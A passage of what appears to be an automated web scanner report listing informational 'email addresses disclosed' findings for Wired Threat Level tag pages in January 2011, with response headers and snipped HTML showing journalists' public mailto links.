<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.96. http://www.wired.com/threatlevel/tag/censorship/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/censorship/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:02 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 15:33:25 GMT
Date: Wed, 12 Jan 2011 15:33:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.97. http://www.wired.com/threatlevel/tag/china/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/china/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:03 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=2
Expires: Wed, 12 Jan 2011 15:33:29 GMT
Date: Wed, 12 Jan 2011 15:33:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.98. http://www.wired.com/threatlevel/tag/copyright/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/copyright/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
editor@wired.co.uk
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:05 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=32
Expires: Wed, 12 Jan 2011 15:34:01 GMT
Date: Wed, 12 Jan 2011 15:33:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.99. http://www.wired.com/threatlevel/tag/crime/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/crime/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
krebsonsecurity@gmail.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:06 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=57
Expires: Wed, 12 Jan 2011 15:34:33 GMT
Date: Wed, 12 Jan 2011 15:33:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:krebsonsecurity@gmail.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.100. http://www.wired.com/threatlevel/tag/defcon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/defcon/

Issue detail

The following email addresses were disclosed in the response:

dave@eecue.com
david_kravets@wired.com
eecue@eecue.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.101. http://www.wired.com/threatlevel/tag/dmca/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/dmca/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:08 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=5
Expires: Wed, 12 Jan 2011 15:34:08 GMT
Date: Wed, 12 Jan 2011 15:34:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.102. http://www.wired.com/threatlevel/tag/facebook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/facebook/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:35:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=61
Expires: Wed, 12 Jan 2011 15:35:05 GMT
Date: Wed, 12 Jan 2011 15:34:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.103. http://www.wired.com/threatlevel/tag/fbi/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/fbi/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:09 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=4
Expires: Wed, 12 Jan 2011 15:34:12 GMT
Date: Wed, 12 Jan 2011 15:34:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.104. http://www.wired.com/threatlevel/tag/file-sharing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/file-sharing/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:54:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=475
Expires: Wed, 12 Jan 2011 15:42:07 GMT
Date: Wed, 12 Jan 2011 15:34:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.105. http://www.wired.com/threatlevel/tag/first-amendment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/first-amendment/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:11 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=460
Expires: Wed, 12 Jan 2011 15:41:52 GMT
Date: Wed, 12 Jan 2011 15:34:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.106. http://www.wired.com/threatlevel/tag/google/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/google/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
jacqui@arstechnica.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:33:32 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:15 GMT
Date: Wed, 12 Jan 2011 15:34:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:jacqui@arstechnica.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.107. http://www.wired.com/threatlevel/tag/hack/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/hack/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
jya@pipeline.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
someone@wikileaks.org
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:09:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:18 GMT
Date: Wed, 12 Jan 2011 15:34:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>The hacker noted that ...someone@wikileaks.org writes about problems with their leader and problems with money. He sends a PDF (was published to the site recently), some chat logs, and information about the encryption process for submits that he t
...[SNIP]...
<p>The whois record for Cryptome, which is hosted by Network Solutions, listed the site contact address as jya@pipeline.com, one of Young’s accounts.</p>
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.108. http://www.wired.com/threatlevel/tag/hacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/hacking/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel1@wired.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:14 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:42:19 GMT
Date: Wed, 12 Jan 2011 15:34:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:threatlevel1@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.109. http://www.wired.com/threatlevel/tag/intellectual-property/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/intellectual-property/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:21:42 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:26 GMT
Date: Wed, 12 Jan 2011 15:34:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.110. http://www.wired.com/threatlevel/tag/mpaa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/mpaa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:20:07 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=433
Expires: Wed, 12 Jan 2011 15:41:44 GMT
Date: Wed, 12 Jan 2011 15:34:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
